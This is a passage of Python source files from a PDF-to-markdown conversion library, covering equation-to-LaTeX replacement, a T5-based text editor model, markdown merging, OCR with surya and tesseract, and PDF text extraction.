= (find_insert_block(page.blocks, region), 0) block_lines_to_remove = defaultdict(set) for region_idx, equation_region in enumerate(equation_regions): if region_idx not in equation_lines or len(equation_lines[region_idx]) == 0: block_text = "" total_tokens = 0 else: equation_block = equation_lines[region_idx] block_text = " ".join([line.prelim_text for line in equation_block]) total_tokens = get_total_texify_tokens(block_text, processor) equation_insert = insert_points[region_idx] equation_insert_line_idx = equation_insert[1] equation_insert_line_idx -= len( [x for x in lines_to_remove[region_idx] if x[0] == equation_insert[0] and x[1] < equation_insert[1]]) selected_blocks = [equation_insert[0], equation_insert_line_idx, total_tokens, block_text, equation_region] if total_tokens < settings.TEXIFY_MODEL_MAX: # Account for the lines we're about to remove for item in lines_to_remove[region_idx]: block_lines_to_remove[item[0]].add(item[1]) equation_blocks.append(selected_blocks) # Remove the lines from the blocks for block_idx, bad_lines in block_lines_to_remove.items(): block = page.blocks[block_idx] block.lines = [line for idx, line in enumerate(block.lines) if idx not in bad_lines] return equation_blocks def increment_insert_points(page_equation_blocks, insert_block_idx, insert_count): for idx, (block_idx, line_idx, token_count, block_text, equation_bbox) in enumerate(page_equation_blocks): if block_idx >= insert_block_idx: page_equation_blocks[idx][0] += insert_count def insert_latex_block(page_blocks: Page, page_equation_blocks, predictions, pnum, processor): converted_spans = [] idx = 0 success_count = 0 fail_count = 0 for block_number, (insert_block_idx, insert_line_idx, token_count, block_text, equation_bbox) in enumerate(page_equation_blocks): latex_text = predictions[block_number] conditions = [ get_total_texify_tokens(latex_text, processor) < settings.TEXIFY_MODEL_MAX, # Make sure we didn't get to the overall token max, indicates run-on len(latex_text) > len(block_text) * .7, len(latex_text.strip()) > 0 ] new_block = Block( lines=[Line( spans=[ Span( text=block_text.replace("\n", " "), bbox=equation_bbox, span_id=f"{pnum}_{idx}_fixeq", font="Latex", font_weight=0, font_size=0 ) ], bbox=equation_bbox )], bbox=equation_bbox, block_type="Formula", pnum=pnum ) if not all(conditions): fail_count += 1 else: success_count += 1 new_block.lines[0].spans[0].text = latex_text.replace("\n", " ") converted_spans.append(deepcopy(new_block.lines[0].spans[0])) # Add in the new LaTeX block if insert_line_idx == 0: page_blocks.blocks.insert(insert_block_idx, new_block) increment_insert_points(page_equation_blocks, insert_block_idx, 1) elif insert_line_idx >= len(page_blocks.blocks[insert_block_idx].lines): page_blocks.blocks.insert(insert_block_idx + 1, new_block) increment_insert_points(page_equation_blocks, insert_block_idx + 1, 1) else: new_blocks = [] for block_idx, block in enumerate(page_blocks.blocks): if block_idx == insert_block_idx: split_block = split_block_lines(block, insert_line_idx) new_blocks.append(split_block[0]) new_blocks.append(new_block) new_blocks.append(split_block[1]) increment_insert_points(page_equation_blocks, insert_block_idx, 2) else: new_blocks.append(block) page_blocks.blocks = new_blocks return success_count, fail_count, converted_spans def replace_equations(doc, pages: List[Page], texify_model, batch_multiplier=1): unsuccessful_ocr = 0 successful_ocr = 0 # Find potential equation regions, and length of text in each region equation_blocks = [] for pnum, page in enumerate(pages): equation_blocks.append(find_equation_blocks(page, texify_model.processor)) eq_count = sum([len(x) for x in equation_blocks]) images = [] token_counts = [] for page_idx, page_equation_blocks in enumerate(equation_blocks): page_obj = doc[page_idx] for equation_idx, (insert_block_idx, insert_line_idx, token_count, block_text, equation_bbox) in enumerate(page_equation_blocks): png_image = render_bbox_image(page_obj, pages[page_idx], equation_bbox) images.append(png_image) token_counts.append(token_count) # Make batched predictions predictions = get_latex_batched(images, token_counts, texify_model, batch_multiplier=batch_multiplier) # Replace blocks with predictions page_start = 0 converted_spans = [] for page_idx, page_equation_blocks in enumerate(equation_blocks): page_equation_count = len(page_equation_blocks) page_predictions = predictions[page_start:page_start + page_equation_count] success_count, fail_count, converted_span = insert_latex_block( pages[page_idx], page_equation_blocks, page_predictions, page_idx, texify_model.processor ) converted_spans.extend(converted_span) page_start += page_equation_count successful_ocr += success_count unsuccessful_ocr += fail_count # If debug mode is on, dump out conversions for comparison dump_equation_debug_data(doc, images, converted_spans) return pages, {"successful_ocr": successful_ocr, "unsuccessful_ocr": unsuccessful_ocr, "equations": eq_count} File: marker/postprocessors/t5.py from transformers import T5Config, T5PreTrainedModel import torch from torch import nn from copy import deepcopy from typing import Optional, Tuple, Union from itertools import chain from transformers.modeling_outputs import TokenClassifierOutput from transformers.models.t5.modeling_t5 import T5Stack from transformers.utils.model_parallel_utils import get_device_map, assert_device_map def byt5_tokenize(text: str, max_length: int, pad_token_id: int = 0): byte_codes = [] for char in text: # Add 3 to account for special tokens byte_codes.append([byte + 3 for byte in char.encode('utf-8')]) tokens = list(chain.from_iterable(byte_codes)) # Map each token to the character it represents char_token_lengths = [len(b) for b in byte_codes] batched_tokens = [] attention_mask = [] for i in range(0, len(tokens), max_length): batched_tokens.append(tokens[i:i + max_length]) attention_mask.append([1] * len(batched_tokens[-1])) # Pad last item if len(batched_tokens[-1]) < max_length: batched_tokens[-1] += [pad_token_id] * (max_length - len(batched_tokens[-1])) attention_mask[-1] += [0] * (max_length - len(attention_mask[-1])) return {"input_ids": batched_tokens, "attention_mask": attention_mask, "char_token_lengths": char_token_lengths} # From https://github.com/osainz59/t5-encoder class T5ForTokenClassification(T5PreTrainedModel): _keys_to_ignore_on_load_missing = [r"encoder.embed_tokens.weight"] def __init__(self, config: T5Config): super().__init__(config) self.model_dim = config.d_model self.shared = nn.Embedding(config.vocab_size, config.d_model) encoder_config = deepcopy(config) encoder_config.is_decoder = False encoder_config.is_encoder_decoder = False encoder_config.use_cache = False self.encoder = T5Stack(encoder_config, self.shared) classifier_dropout = ( config.classifier_dropout if hasattr(config, 'classifier_dropout') else config.dropout_rate ) self.dropout = nn.Dropout(classifier_dropout) self.classifier = nn.Linear(config.d_model, config.num_labels) # Initialize weights and apply final processing self.post_init() # Model parallel self.model_parallel = False self.device_map = None def parallelize(self, device_map=None): self.device_map = ( get_device_map(len(self.encoder.block), range(torch.cuda.device_count())) if device_map is None else device_map ) assert_device_map(self.device_map, len(self.encoder.block)) self.encoder.parallelize(self.device_map) self.classifier.to(self.encoder.first_device) self.model_parallel = True def deparallelize(self): self.encoder.deparallelize() self.encoder = self.encoder.to("cpu") self.classifier = self.classifier.to("cpu") self.model_parallel = False self.device_map = None torch.cuda.empty_cache() def get_input_embeddings(self): return self.shared def set_input_embeddings(self, new_embeddings): self.shared = new_embeddings self.encoder.set_input_embeddings(new_embeddings) def get_encoder(self): return self.encoder def _prune_heads(self, heads_to_prune): for layer, heads in heads_to_prune.items(): self.encoder.block[layer].layer[0].SelfAttention.prune_heads(heads) def forward( self, input_ids: Optional[torch.LongTensor] = None, attention_mask: Optional[torch.FloatTensor] = None, head_mask: Optional[torch.FloatTensor] = None, inputs_embeds: Optional[torch.FloatTensor] = None, labels: Optional[torch.LongTensor] = None, output_attentions: Optional[bool] = None, output_hidden_states: Optional[bool] = None, return_dict: Optional[bool] = None, ) -> Union[Tuple[torch.FloatTensor], TokenClassifierOutput]: return_dict = return_dict if return_dict is not None else self.config.use_return_dict outputs = self.encoder( input_ids=input_ids, attention_mask=attention_mask, inputs_embeds=inputs_embeds, head_mask=head_mask, output_attentions=output_attentions, output_hidden_states=output_hidden_states, return_dict=return_dict, ) sequence_output = outputs[0] sequence_output = self.dropout(sequence_output) logits = self.classifier(sequence_output) loss = None if not return_dict: output = (logits,) + outputs[2:] return ((loss,) + output) if loss is not None else output return TokenClassifierOutput( loss=loss, logits=logits, hidden_states=outputs.hidden_states, attentions=outputs.attentions ) File: marker/postprocessors/markdown.py from marker.schema.merged import MergedLine, MergedBlock, FullyMergedBlock from marker.schema.page import Page import re import regex from typing import List from marker.settings import settings def escape_markdown(text): # List of characters that need to be escaped in markdown characters_to_escape = r"[#]" # Escape each of these characters with a backslash escaped_text = re.sub(characters_to_escape, r'\\\g<0>', text) return escaped_text def surround_text(s, char_to_insert): leading_whitespace = re.match(r'^(\s*)', s).group(1) trailing_whitespace = re.search(r'(\s*)$', s).group(1) stripped_string = s.strip() modified_string = char_to_insert + stripped_string + char_to_insert final_string = leading_whitespace + modified_string + trailing_whitespace return final_string def merge_spans(pages: List[Page]) -> List[List[MergedBlock]]: merged_blocks = [] for page in pages: page_blocks = [] for blocknum, block in enumerate(page.blocks): block_lines = [] for linenum, line in enumerate(block.lines): line_text = "" if len(line.spans) == 0: continue fonts = [] for i, span in enumerate(line.spans): font = span.font.lower() next_span = None next_idx = 1 while len(line.spans) > i + next_idx: next_span = line.spans[i + next_idx] next_idx += 1 if len(next_span.text.strip()) > 2: break fonts.append(font) span_text = span.text # Don't bold or italicize very short sequences # Avoid bolding first and last sequence so lines can be joined properly if len(span_text) > 3 and 0 < i < len(line.spans) - 1: if span.italic and (not next_span or not next_span.italic): span_text = surround_text(span_text, "*") elif span.bold and (not next_span or not next_span.bold): span_text = surround_text(span_text, "**") line_text += span_text block_lines.append(MergedLine( text=line_text, fonts=fonts, bbox=line.bbox )) if len(block_lines) > 0: page_blocks.append(MergedBlock( lines=block_lines, pnum=block.pnum, bbox=block.bbox, block_type=block.block_type )) merged_blocks.append(page_blocks) return merged_blocks def block_surround(text, block_type): if block_type == "Section-header": if not text.startswith("#"): text = "\n## " + text.strip().title() + "\n" elif block_type == "Title": if not text.startswith("#"): text = "# " + text.strip().title() + "\n" elif block_type == "Table": text = "\n" + text + "\n" elif block_type == "List-item": text = escape_markdown(text) elif block_type == "Code": text = "\n```\n" + text + "\n```\n" elif block_type == "Text": text = escape_markdown(text) elif block_type == "Formula": if text.strip().startswith("$$") and text.strip().endswith("$$"): text = text.strip() text = "\n" + text + "\n" return text def line_separator(line1, line2, block_type, is_continuation=False): # Should cover latin-derived languages and russian lowercase_letters = r'\p{Lo}|\p{Ll}|\d' hyphens = r'-—¬' # Remove hyphen in current line if next line and current line appear to be joined hyphen_pattern = regex.compile(rf'.*[{lowercase_letters}][{hyphens}]\s?$', regex.DOTALL) if line1 and hyphen_pattern.match(line1) and regex.match(rf"^\s?[{lowercase_letters}]", line2): # Split on — or - from the right line1 = regex.split(rf"[{hyphens}]\s?$", line1)[0] return line1.rstrip() + line2.lstrip() all_letters = r'\p{L}|\d' sentence_continuations = r',;\(\—\"\'\*' sentence_ends = r'。ๆ\.?!' line_end_pattern = regex.compile(rf'.*[{lowercase_letters}][{sentence_continuations}]?\s?$', regex.DOTALL) line_start_pattern = regex.compile(rf'^\s?[{all_letters}]', regex.DOTALL) sentence_end_pattern = regex.compile(rf'.*[{sentence_ends}]\s?$', regex.DOTALL) text_blocks = ["Text", "List-item", "Footnote", "Caption", "Figure"] if block_type in ["Title", "Section-header"]: return line1.rstrip() + " " + line2.lstrip() elif block_type == "Formula": return line1 + "\n" + line2 elif line_end_pattern.match(line1) and line_start_pattern.match(line2) and block_type in text_blocks: return line1.rstrip() + " " + line2.lstrip() elif is_continuation: return line1.rstrip() + " " + line2.lstrip() elif block_type in text_blocks and sentence_end_pattern.match(line1): return line1 + "\n\n" + line2 elif block_type == "Table": return line1 + "\n\n" + line2 else: return line1 + "\n" + line2 def block_separator(line1, line2, block_type1, block_type2): sep = "\n" if block_type1 == "Text": sep = "\n\n" return sep + line2 def merge_lines(blocks: List[List[MergedBlock]]): text_blocks = [] prev_type = None prev_line = None block_text = "" block_type = "" for idx, page in enumerate(blocks): for block in page: block_type = block.block_type if block_type != prev_type and prev_type: text_blocks.append( FullyMergedBlock( text=block_surround(block_text, prev_type), block_type=prev_type ) ) block_text = "" prev_type = block_type # Join lines in the block together properly for i, line in enumerate(block.lines): line_height = line.bbox[3] - line.bbox[1] prev_line_height = prev_line.bbox[3] - prev_line.bbox[1] if prev_line else 0 prev_line_x = prev_line.bbox[0] if prev_line else 0 prev_line = line is_continuation = line_height == prev_line_height and line.bbox[0] == prev_line_x if block_text: block_text = line_separator(block_text, line.text, block_type, is_continuation) else: block_text = line.text if settings.PAGINATE_OUTPUT and idx < len(blocks) - 1: block_text += "\n\n" + "-" * 16 + "\n\n" # Page separator horizontal rule # Append the final block text_blocks.append( FullyMergedBlock( text=block_surround(block_text, prev_type), block_type=block_type ) ) return text_blocks def get_full_text(text_blocks): full_text = "" prev_block = None for block in text_blocks: if prev_block: full_text += block_separator(prev_block.text, block.text, prev_block.block_type, block.block_type) else: full_text += block.text prev_block = block return full_text File: marker/postprocessors/editor.py from collections import defaultdict from itertools import chain from typing import Optional from marker.settings import settings import torch import torch.nn.functional as F from marker.postprocessors.t5 import T5ForTokenClassification, byt5_tokenize def get_batch_size(): if settings.EDITOR_BATCH_SIZE is not None: return settings.EDITOR_BATCH_SIZE elif settings.TORCH_DEVICE_MODEL == "cuda": return 12 return 6 def load_editing_model(device=None, dtype=None): if not settings.ENABLE_EDITOR_MODEL: return None if device: model = T5ForTokenClassification.from_pretrained( settings.EDITOR_MODEL_NAME, torch_dtype=dtype, device=device, ) else: model = T5ForTokenClassification.from_pretrained( settings.EDITOR_MODEL_NAME, torch_dtype=settings.MODEL_DTYPE, ).to(settings.TORCH_DEVICE_MODEL) model.eval() model.config.label2id = { "equal": 0, "delete": 1, "newline-1": 2, "space-1": 3, } model.config.id2label = {v: k for k, v in model.config.label2id.items()} return model def edit_full_text(text: str, model: Optional[T5ForTokenClassification], batch_multiplier=1) -> (str, dict): if not model: return text, {} batch_size = get_batch_size() * batch_multiplier tokenized = byt5_tokenize(text, settings.EDITOR_MAX_LENGTH) input_ids = tokenized["input_ids"] char_token_lengths = tokenized["char_token_lengths"] # Run model token_masks = [] for i in range(0, len(input_ids), batch_size): batch_input_ids = tokenized["input_ids"][i: i + batch_size] batch_input_ids = torch.tensor(batch_input_ids, device=model.device) batch_attention_mask = tokenized["attention_mask"][i: i + batch_size] batch_attention_mask = torch.tensor(batch_attention_mask, device=model.device) with torch.inference_mode(): predictions = model(batch_input_ids, attention_mask=batch_attention_mask) logits = predictions.logits.cpu() # If the max probability is less than a threshold, we assume it's a bad prediction # We want to be conservative to not edit the text too much probs = F.softmax(logits, dim=-1) max_prob = torch.max(probs, dim=-1) cutoff_prob = max_prob.values < settings.EDITOR_CUTOFF_THRESH labels = logits.argmax(-1) labels[cutoff_prob] = model.config.label2id["equal"] labels = labels.squeeze().tolist() if len(labels) == settings.EDITOR_MAX_LENGTH: labels = [labels] labels = list(chain.from_iterable(labels)) token_masks.extend(labels) # List of characters in the text flat_input_ids = list(chain.from_iterable(input_ids)) # Strip special tokens 0,1. Keep unknown token, although it should never be used assert len(token_masks) == len(flat_input_ids) token_masks = [mask for mask, token in zip(token_masks, flat_input_ids) if token >= 2] assert len(token_masks) == len(list(text.encode("utf-8"))) edit_stats = defaultdict(int) out_text = [] start = 0 for i, char in enumerate(text): char_token_length = char_token_lengths[i] masks = token_masks[start: start + char_token_length] labels = [model.config.id2label[mask] for mask in masks] if all(l == "delete" for l in labels): # If we delete whitespace, roll with it, otherwise ignore if char.strip(): out_text.append(char) else: edit_stats["delete"] += 1 elif labels[0] == "newline-1": out_text.append("\n") out_text.append(char) edit_stats["newline-1"] += 1 elif labels[0] == "space-1": out_text.append(" ") out_text.append(char) edit_stats["space-1"] += 1 else: out_text.append(char) edit_stats["equal"] += 1 start += char_token_length out_text = "".join(out_text) return out_text, edit_stats File: marker/ocr/recognition.py import tempfile from itertools import repeat from typing import List, Optional, Dict import pypdfium2 as pdfium import io from concurrent.futures import ThreadPoolExecutor from surya.ocr import run_recognition from marker.models import setup_recognition_model from marker.ocr.heuristics import should_ocr_page, no_text_found, detect_bad_ocr from marker.ocr.lang import langs_to_ids from marker.pdf.images import render_image from marker.schema.page import Page from marker.schema.block import Block, Line, Span from marker.settings import settings from marker.pdf.extract_text import get_text_blocks def get_batch_size(): if settings.RECOGNITION_BATCH_SIZE is not None: return settings.RECOGNITION_BATCH_SIZE elif settings.TORCH_DEVICE_MODEL == "cuda": return 32 elif settings.TORCH_DEVICE_MODEL == "mps": return 32 return 32 def run_ocr(doc, pages: List[Page], langs: List[str], rec_model, batch_multiplier=1, ocr_all_pages=False) -> (List[Page], Dict): ocr_pages = 0 ocr_success = 0 ocr_failed = 0 no_text = no_text_found(pages) ocr_idxs = [] for pnum, page in enumerate(pages): ocr_needed = should_ocr_page(page, no_text, ocr_all_pages=ocr_all_pages) if ocr_needed: ocr_idxs.append(pnum) ocr_pages += 1 # No pages need OCR if ocr_pages == 0: return pages, {"ocr_pages": 0, "ocr_failed": 0, "ocr_success": 0, "ocr_engine": "none"} ocr_method = settings.OCR_ENGINE if ocr_method is None or ocr_method == "None": return pages, {"ocr_pages": 0, "ocr_failed": 0, "ocr_success": 0, "ocr_engine": "none"} elif ocr_method == "surya": new_pages = surya_recognition(doc, ocr_idxs, langs, rec_model, pages, batch_multiplier=batch_multiplier) elif ocr_method == "ocrmypdf": new_pages = tesseract_recognition(doc, ocr_idxs, langs) else: raise ValueError(f"Unknown OCR method {ocr_method}") for orig_idx, page in zip(ocr_idxs, new_pages): if detect_bad_ocr(page.prelim_text) or len(page.prelim_text) == 0: ocr_failed += 1 else: ocr_success += 1 pages[orig_idx] = page return pages, {"ocr_pages": ocr_pages, "ocr_failed": ocr_failed, "ocr_success": ocr_success, "ocr_engine": ocr_method} def surya_recognition(doc, page_idxs, langs: List[str], rec_model, pages: List[Page], batch_multiplier=1) -> List[Optional[Page]]: images = [render_image(doc[pnum], dpi=settings.SURYA_OCR_DPI) for pnum in page_idxs] processor = rec_model.processor selected_pages = [p for i, p in enumerate(pages) if i in page_idxs] surya_langs = [langs] * len(page_idxs) detection_results = [p.text_lines.bboxes for p in selected_pages] polygons = [[b.polygon for b in bboxes] for bboxes in detection_results] results = run_recognition(images, surya_langs, rec_model, processor, polygons=polygons, batch_size=int(get_batch_size() * batch_multiplier)) new_pages = [] for (page_idx, result, old_page) in zip(page_idxs, results, selected_pages): text_lines = old_page.text_lines ocr_results = result.text_lines blocks = [] for i, line in enumerate(ocr_results): block = Block( bbox=line.bbox, pnum=page_idx, lines=[Line( bbox=line.bbox, spans=[Span( text=line.text, bbox=line.bbox, span_id=f"{page_idx}_{i}", font="", font_weight=0, font_size=0, ) ] )] ) blocks.append(block) page = Page( blocks=blocks, pnum=page_idx, bbox=result.image_bbox, rotation=0, text_lines=text_lines, ocr_method="surya" ) new_pages.append(page) return new_pages def tesseract_recognition(doc, page_idxs, langs: List[str]) -> List[Optional[Page]]: pdf_pages = generate_single_page_pdfs(doc, page_idxs) with ThreadPoolExecutor(max_workers=settings.OCR_PARALLEL_WORKERS) as executor: pages = list(executor.map(_tesseract_recognition, pdf_pages, repeat(langs, len(pdf_pages)))) return pages def generate_single_page_pdfs(doc, page_idxs) -> List[io.BytesIO]: pdf_pages = [] for page_idx in page_idxs: blank_doc = pdfium.PdfDocument.new() blank_doc.import_pages(doc, pages=[page_idx]) assert len(blank_doc) == 1, "Failed to import page" in_pdf = io.BytesIO() blank_doc.save(in_pdf) in_pdf.seek(0) pdf_pages.append(in_pdf) return pdf_pages def _tesseract_recognition(in_pdf, langs: List[str]) -> Optional[Page]: import ocrmypdf out_pdf = io.BytesIO() ocrmypdf.ocr( in_pdf, out_pdf, language=langs[0], output_type="pdf", redo_ocr=None, force_ocr=True, progress_bar=False, optimize=False, fast_web_view=1e6, skip_big=15, # skip images larger than 15 megapixels tesseract_timeout=settings.TESSERACT_TIMEOUT, tesseract_non_ocr_timeout=settings.TESSERACT_TIMEOUT, ) with tempfile.NamedTemporaryFile() as f: f.write(out_pdf.getvalue()) f.seek(0) new_doc = pdfium.PdfDocument(f.name) blocks, _ = get_text_blocks(new_doc, f.name, max_pages=1) page = blocks[0] page.ocr_method = "tesseract" return page File: marker/ocr/lang.py from typing import List from surya.languages import CODE_TO_LANGUAGE, LANGUAGE_TO_CODE from surya.model.recognition.tokenizer import _tokenize as lang_tokenize from marker.ocr.tesseract import LANGUAGE_TO_TESSERACT_CODE, TESSERACT_CODE_TO_LANGUAGE from marker.settings import settings def langs_to_ids(langs: List[str]): unique_langs = list(set(langs)) _, lang_tokens = lang_tokenize("", unique_langs) return lang_tokens def replace_langs_with_codes(langs): if settings.OCR_ENGINE == "surya": if langs is None: return for i, lang in enumerate(langs): if lang.title() in LANGUAGE_TO_CODE: langs[i] = LANGUAGE_TO_CODE[lang.title()] else: if langs is None: langs = [settings.DEFAULT_LANG] print(f"No languages specified for tesseract, defaulting to {settings.DEFAULT_LANG}.") for i, lang in enumerate(langs): if lang in LANGUAGE_TO_CODE: langs[i] = LANGUAGE_TO_TESSERACT_CODE[lang] return langs def validate_langs(langs): if settings.OCR_ENGINE == "surya": if langs is None: return for lang in langs: if lang not in CODE_TO_LANGUAGE: raise ValueError(f"Invalid language code {lang} for Surya OCR") else: for lang in langs: if lang not in TESSERACT_CODE_TO_LANGUAGE: raise ValueError(f"Invalid language code {lang} for Tesseract") File: marker/ocr/tesseract.py LANGUAGE_TO_TESSERACT_CODE = { 'Afrikaans': 'afr', 'Amharic': 'amh', 'Arabic': 'ara', 'Assamese': 'asm', 'Azerbaijani': 'aze', 'Belarusian': 'bel', 'Bulgarian': 'bul', 'Bengali': 'ben', 'Breton': 'bre', 'Bosnian': 'bos', 'Catalan': 'cat', 'Czech': 'ces', 'Welsh': 'cym', 'Danish': 'dan', 'German': 'deu', 'Greek': 'ell', 'English': 'eng', 'Esperanto': 'epo', 'Spanish': 'spa', 'Estonian': 'est', 'Basque': 'eus', 'Persian': 'fas', 'Finnish': 'fin', 'French': 'fra', 'Western Frisian': 'fry', 'Irish': 'gle', 'Scottish Gaelic': 'gla', 'Galician': 'glg', 'Gujarati': 'guj', 'Hausa': 'hau', 'Hebrew': 'heb', 'Hindi': 'hin', 'Croatian': 'hrv', 'Hungarian': 'hun', 'Armenian': 'hye', 'Indonesian': 'ind', 'Icelandic': 'isl', 'Italian': 'ita', 'Japanese': 'jpn', 'Javanese': 'jav', 'Georgian': 'kat', 'Kazakh': 'kaz', 'Khmer': 'khm', 'Kannada': 'kan', 'Korean': 'kor', 'Kurdish': 'kur', 'Kyrgyz': 'kir', 'Latin': 'lat', 'Lao': 'lao', 'Lithuanian': 'lit', 'Latvian': 'lav', 'Malagasy': 'mlg', 'Macedonian': 'mkd', 'Malayalam': 'mal', 'Mongolian': 'mon', 'Marathi': 'mar', 'Malay': 'msa', 'Burmese': 'mya', 'Nepali': 'nep', 'Dutch': 'nld', 'Norwegian': 'nor', 'Oromo': 'orm', 'Oriya': 'ori', 'Punjabi': 'pan', 'Polish': 'pol', 'Pashto': 'pus', 'Portuguese': 'por', 'Romanian': 'ron', 'Russian': 'rus', 'Sanskrit': 'san', 'Sindhi': 'snd', 'Sinhala': 'sin', 'Slovak': 'slk', 'Slovenian': 'slv', 'Somali': 'som', 'Albanian': 'sqi', 'Serbian': 'srp', 'Sundanese': 'sun', 'Swedish': 'swe', 'Swahili': 'swa', 'Tamil': 'tam', 'Telugu': 'tel', 'Thai': 'tha', 'Tagalog': 'tgl', 'Turkish': 'tur', 'Uyghur': 'uig', 'Ukrainian': 'ukr', 'Urdu': 'urd', 'Uzbek': 'uzb', 'Vietnamese': 'vie', 'Xhosa': 'xho', 'Yiddish': 'yid', 'Chinese': 'chi_sim', } TESSERACT_CODE_TO_LANGUAGE = {v:k for k,v in LANGUAGE_TO_TESSERACT_CODE.items()} File: marker/ocr/detection.py from typing import List from pypdfium2 import PdfDocument from surya.detection import batch_text_detection from marker.pdf.images import render_image from marker.schema.page import Page from marker.settings import settings def get_batch_size(): if settings.DETECTOR_BATCH_SIZE is not None: return settings.DETECTOR_BATCH_SIZE elif settings.TORCH_DEVICE_MODEL == "cuda": return 4 return 4 def surya_detection(doc: PdfDocument, pages: List[Page], det_model, batch_multiplier=1): processor = det_model.processor max_len = min(len(pages), len(doc)) images = [render_image(doc[pnum], dpi=settings.SURYA_DETECTOR_DPI) for pnum in range(max_len)] predictions = batch_text_detection(images, det_model, processor, batch_size=int(get_batch_size() * batch_multiplier)) for (page, pred) in zip(pages, predictions): page.text_lines = pred File: marker/ocr/heuristics.py import re from typing import List from marker.ocr.utils import alphanum_ratio from marker.schema.bbox import rescale_bbox, box_intersection_pct from marker.schema.page import Page from marker.settings import settings def should_ocr_page(page: Page, no_text: bool, ocr_all_pages=False): detected_lines_found, total_lines = detected_line_coverage(page) # No reason to OCR page if it has no text lines if total_lines == 0: return False # OCR page if we got minimal text, or if we got too many spaces conditions = [ no_text, # Full doc has no text, and needs full OCR (len(page.prelim_text) > 0 and detect_bad_ocr(page.prelim_text)), # Bad OCR detected_lines_found is False, # didn't extract text for all detected lines ] return any(conditions) or ocr_all_pages def detect_bad_ocr(text, space_threshold=.7, newline_threshold=.6, alphanum_threshold=.3): if len(text) == 0: # Assume OCR failed if we have no text return True spaces = len(re.findall(r'\s+', text)) alpha_chars = len(re.sub(r'\s+', '', text)) if spaces / (alpha_chars + spaces) > space_threshold: return True newlines = len(re.findall(r'\n+', text)) non_newlines = len(re.sub(r'\n+', '', text)) if newlines / (newlines + non_newlines) > newline_threshold: return True if alphanum_ratio(text) < alphanum_threshold: # Garbled text return True invalid_chars = len([c for c in text if c in settings.INVALID_CHARS]) if invalid_chars > max(6.0, len(text) * .03): return True return False def no_text_found(pages: List[Page]): full_text = "" for page in pages: full_text += page.prelim_text return len(full_text.strip()) == 0 def detected_line_coverage(page: Page, intersect_thresh=.5, detection_thresh=.4): found_lines = 0 for detected_line in page.text_lines.bboxes: # Get bbox and rescale to match dimensions of original page detected_bbox = detected_line.bbox detected_bbox = rescale_bbox(page.text_lines.image_bbox, page.bbox, detected_bbox) total_intersection = 0 for block in page.blocks: for line in block.lines: intersection_pct = box_intersection_pct(detected_bbox, line.bbox) total_intersection += intersection_pct if total_intersection > intersect_thresh: found_lines += 1 total_lines = len(page.text_lines.bboxes) if total_lines == 0: return True, 0 return found_lines / total_lines > detection_thresh, total_lines File: marker/ocr/utils.py def alphanum_ratio(text): text = text.replace(" ", "") text = text.replace("\n", "") alphanumeric_count = sum([1 for c in text if c.isalnum()]) if len(text) == 0: return 1 ratio = alphanumeric_count / len(text) return ratio File: marker/pdf/extract_text.py import os from typing import List, Optional, Dict import pypdfium2 as pdfium import pypdfium2.internal as pdfium_i from marker.pdf.utils import font_flags_decomposer from marker.settings import settings from marker.schema.block import Span, Line, Block from marker.schema.page import Page from pdftext.extraction import dictionary_output os.environ["TESSDATA_PREFIX"] = settings.TESSDATA_PREFIX def pdftext_format_to_blocks(page, pnum: int) -> Page: page_blocks = [] span_id = 0 for block_idx, block in enumerate(page["blocks"]): block_lines = [] for l in block["lines"]: spans = [] for i, s in enumerate(l["spans"]): block_text = s["text"] # Remove trailing newlines and carriage returns (tesseract) while len(block_text) > 0 and block_text[-1] in ["\n", "\r"]: block_text = block_text[:-1] block_text = block_text.replace("-\n", "") # Remove hyphenated line breaks span_obj = Span( text=block_text, # Remove end of line newlines, not spaces bbox=s["bbox"], span_id=f"{pnum}_{span_id}", font=f"{s['font']['name']}_{font_flags_decomposer(s['font']['flags'])}", # Add font flags to end of font font_weight=s["font"]["weight"], font_size=s["font"]["size"], ) spans.append(span_obj) # Text, bounding box, span id span_id += 1 line_obj = Line( spans=spans, bbox=l["bbox"], ) # Only select valid lines, with positive bboxes if line_obj.area >= 0: block_lines.append(line_obj) block_obj = Block( lines=block_lines, bbox=block["bbox"], pnum=pnum ) # Only select blocks with lines if len(block_lines) > 0: page_blocks.append(block_obj) page_bbox = page["bbox"] page_width = abs(page_bbox[2] - page_bbox[0]) page_height = abs(page_bbox[3] - page_bbox[1]) rotation = page["rotation"] # Flip width and height if rotated if rotation == 90 or rotation == 270: page_width, page_height = page_height, page_width char_blocks = page["blocks"] page_bbox = [0, 0, page_width, page_height] out_page = Page( blocks=page_blocks, pnum=page["page"], bbox=page_bbox, rotation=rotation, char_blocks=char_blocks ) return out_page def get_text_blocks(doc, fname, max_pages: Optional[int] = None, start_page: Optional[int] = None) -> (List[Page], Dict): toc = get_toc(doc) if start_page: assert start_page < len(doc) else: start_page = 0 if max_pages: if max_pages + start_page > len(doc): max_pages = len(doc) - start_page else: max_pages = len(doc) - start_page page_range = range(start_page, start_page + max_pages) char_blocks = dictionary_output(fname, page_range=page_range, keep_chars=True, workers=settings.PDFTEXT_CPU_WORKERS) marker_blocks = [pdftext_format_to_blocks(page, pnum) for pnum, page in enumerate(char_blocks)] return marker_blocks, toc def naive_get_text(doc): full_text = "" for page_idx in range(len(doc)): page = doc.get_page(page_idx) text_page = page.get_textpage() full_text += text_page.get_text_bounded() + "\n" return full_text def get_toc(doc, max_depth=15): toc = doc.get_toc(max_depth=max_depth) toc_list = [] for item in toc: list_item = { "title": item.title, "level": item.level, "is_closed": item.is_closed, "n_kids": item.n_kids, "page_index": item.page_index, "view_mode": pdfium_i.ViewmodeToStr.get(item.view_mode), "view_pos": item.view_pos, } toc_list.append(list_item) return toc_list def get_length_of_text(fname: str) -> int: doc = pdfium.PdfDocument(fname) text = naive_get_text(doc).strip() return len(text) File: marker/pdf/utils.py from typing import Optional import filetype from marker.settings import settings def find_filetype(fpath): kind = filetype.guess(fpath) if kind is None: print(f"Could not determine filetype for {fpath}") return "other" mimetype = kind.mime # Get extensions from mimetype # The mimetype is not always consistent, so use in to check the most common formats if "pdf" in mimetype: return "pdf" elif mimetype in settings.SUPPORTED_FILETYPES: return settings.SUPPORTED_FILETYPES[mimetype] else: print(f"Found nonstandard filetype {mimetype}") return "other" def font_flags_decomposer(flags: Optional[int]) -> str: if flags is None: return "" flag_descriptions = [] if flags & (1 << 0): # PDFFONT_FIXEDPITCH flag_descriptions.append("fixed_pitch") if flags & (1 << 1): # PDFFONT_SERIF flag_descriptions.append("serif") if flags & (1 << 2): # PDFFONT_SYMBOLIC flag_descriptions.append("symbolic") if flags & (1 << 3): # PDFFONT_SCRIPT flag_descriptions.append("script") if flags & (1 << 5): # 